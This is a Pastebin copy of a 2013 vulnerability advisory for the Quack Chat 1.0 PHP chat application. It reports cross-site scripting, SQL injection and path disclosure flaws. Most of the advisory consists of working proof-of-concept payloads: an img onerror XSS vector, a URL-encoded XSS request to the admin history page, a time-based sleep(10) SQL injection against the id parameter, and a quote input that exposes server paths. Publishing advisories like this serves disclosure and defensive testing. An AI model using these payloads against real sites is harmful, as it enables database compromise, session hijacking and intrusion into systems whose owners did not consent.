API tools faq
paste
Advertisement
Mayk0

#; Quack Chat 1.0 - Multiple Vulnerabilities

Mayk0
Aug 18th, 2013
158
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Full title: Quack Chat 1.0 - Multiple Vulnerabilities
  3.  
  4. Date add: 2013-08-18
  5. Category: web applications
  6. Platform: php
  7. Description:
  8. Quark Chat version 1.0 suffers from cross site scripting, path disclosure, and remote SQL injection vulnerabilities.
  9. ================================================================
  10.  
  11. ###########################################################################################
  12. # Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure
  13. # Date: 15 de Agosto del 2013
  14. # Exploit Author: Dylan Irzi
  15. # Credit goes for: websecuritydev.com
  16. # Vendor Homepage: http://www.quack-chat.com/
  17. # Tested on: Win8 & Linux Mint
  18. # Affected Version : 1.0
  19. # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
  20. # Greetz: All team WebSecuritydev.
  21. ###########################################################################################
  22.  
  23. Cross Site Scripting:
  24. Archivos Afectados Afectados
  25.  
  26. qchat.php
  27. qc_admin/index.php?p=history
  28.  
  29. PoC:
  30. localhost/qchat.php
  31. Vector: ""><img src=x onerror=prompt(/XSS/);>>
  32.  
  33. Input:
  34. <input id="name" type="text" style="width:200px;" name="name">
  35. Is Reflected: localhost/qc_admin/index.php?p=history
  36.  
  37. PoC #2:
  38. localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
  39. Example:
  40. localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E
  41.  
  42. -------------------------------------------------------------------
  43. SQL Injection
  44.  
  45. localhost/qc_admin/index.php?p=history&id=(SQL Injection)
  46. localhost/qc_admin/index.php?p=history&page=(SQL Injection)
  47.  
  48. # Exploit-DB note: Here's a PoC:
  49. # <server>/qc_admin/index.php?p=history&id=1 and sleep(10)
  50.  
  51. Accept: */*
  52. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
  53. CLR 2.0.50727)
  54. Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e
  55.  
  56. (Remplazar por una Session Cookie Valida)
  57.  
  58. -------------------------------------------------------------------
  59. Path Diclosure
  60.  
  61. localhost/qc_admin/index.php?p=history&id='
  62.  
  63. in /var/www/chat/qc_admin/index.php on line 249
  64.  
  65. --------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!